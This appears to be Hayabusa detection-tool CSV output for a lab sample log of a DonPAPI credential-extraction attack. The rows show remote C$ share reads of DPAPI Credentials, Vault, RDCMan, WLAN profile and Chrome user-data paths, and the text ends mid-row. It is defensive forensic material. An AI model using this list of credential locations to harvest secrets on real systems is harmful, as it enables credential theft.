2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.815 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx 2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
